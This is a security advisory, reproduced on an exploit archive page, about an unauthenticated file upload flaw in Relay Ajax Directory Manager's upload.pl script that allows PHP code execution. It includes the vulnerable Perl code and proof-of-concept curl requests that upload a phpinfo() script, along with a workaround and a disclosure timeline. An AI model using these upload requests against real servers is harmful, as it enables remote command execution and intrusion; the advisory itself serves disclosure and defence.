exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Relay Ajax Directory Manager 1.5.3 File Upload / Command Execution

Relay Ajax Directory Manager 1.5.3 File Upload / Command Execution
Posted May 31, 2016
Site redteam-pentesting.de

Relay Ajax Directory Manager versions relayb01-071706, 1.5.1, and 1.5.3 suffer from an unauthenticated file upload vulnerability that can result in a shell upload.

tags | exploit, shell, file upload
SHA-256 | 86f16a585b31311d54705ed9a9f89e3e7f9a9f7fb81cc770e74eb4ff7bc82dbc

Relay Ajax Directory Manager 1.5.3 File Upload / Command Execution

Change Mirror Download
Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager
may Lead to Remote Command Execution

A vulnerability within the Relay Ajax Directory Manager web application
allows unauthenticated attackers to upload arbitrary files to the web
server running the web application.


Product: Relay Ajax Directory Manager
Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other
versions most likely vulnerable as well.
Fixed Versions: -
Vulnerability Type: Unauthenticated File Upload
Security Risk: high
Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
Vendor Status: decided not to fix, project is unmaintained
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
file manager. It allows files and folders to be uploaded via drag and
drop and provides several other features, such as a thumbnail preview
for images and basic user authentication functionality.

More Details

While the web application itself is mostly written in PHP, it also
utilizes the Perl script 'upload.pl' for handling uploads initiated by
the user.

Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the
web application. This request is sent to the Perl script and the
following steps are handled by it.
2. A temporary file containing the entire request (including
headers) is created. This temporary file is named partly by the first
URL parameter, as shown in the following listing.
3. The headers and the POST body of the request are parsed and filtered
to determine the final filename.
4. The upload is written to the final destination.
5. A file containing statistics about the upload process is written

During steps 2-5, no checks are performed to ensure that the user is
sufficiently authenticated.

The following listing shows parts of the upload Perl script:

-- upload.pl -----------------------------------------------------------


$sessionid = $qstring[0];


$tmpfile = "$uploadsFolder\\temp_$sessionid";
$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
$tmpfilepre= "$uploadsFolder\\$sessionid\_";


open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
print FILE $filedata;
close FILE;



Here, the first URL parameter is stored in the variable $sessionid. The
content of this variable is then used as a prefix for the filename for
the uploaded data before it ultimately gets written. Given the
configured upload directory, which is 'uploads/' by default, the URL of
the uploaded file can be determined.

The web application usually requires users to be authenticated before
any actions (e.g. uploading) can be performed, but since the Perl script
is not secured by any form of authentication, it can be accessed by
anyone. If the web server does not prohibit the execution of e.g. PHP
files within the upload directory, arbitrary PHP commands can be
executed by uploading the respective files to the web server.

Proof of Concept

In general, the Perl script expects a request containing
multipart/form-data. In this case, the name specified in the 'filename'
field is prepended with the first URL parameter. Using the command line
HTTP client curl, a request like the following can be made to a
vulnerable installation of Relay Ajax Directory Manager in order to
upload a PHP script which invokes the function 'phpinfo()':

curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
--data-binary $'------------------------------83ff53821b7c\x0d\x0a'\
$'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\
$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\
$'<?php phpinfo(); ?>\x0d\x0a'\
$'------------------------------83ff53821b7c--' \

The server responds with HTTP status code 200 indicating a successful

HTTP/1.1 200 OK
Date: Mon, 09 May 2016 11:09:50 GMT
Server: Apache/2.4.18 (Debian)
Content-Length: 0
Content-Type: text/plain

Such a request would yield the following files in the web server's
upload directory upon success:

$ ls relay-1-5-3/uploads/
redteam_info.php stats_redteam.txt temp_redteam

The file redteam_info.php contains the multipart/form-data that was
sent to the upload.pl script:

$ cat relay-1-5-3/uploads/temp_redteam.php
<?php phpinfo(); ?>

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':

$ curl --silent --include --data '<?php phpinfo(); ?>' \

In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/
stats_redteam.php.txt temp_redteam.php

$ cat temp_redteam.php
<?php phpinfo(); ?>

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server e.g. in order to easily execute PHP
commands with the privileges of the web server.


One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.



Security Risk

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.


2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published


[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By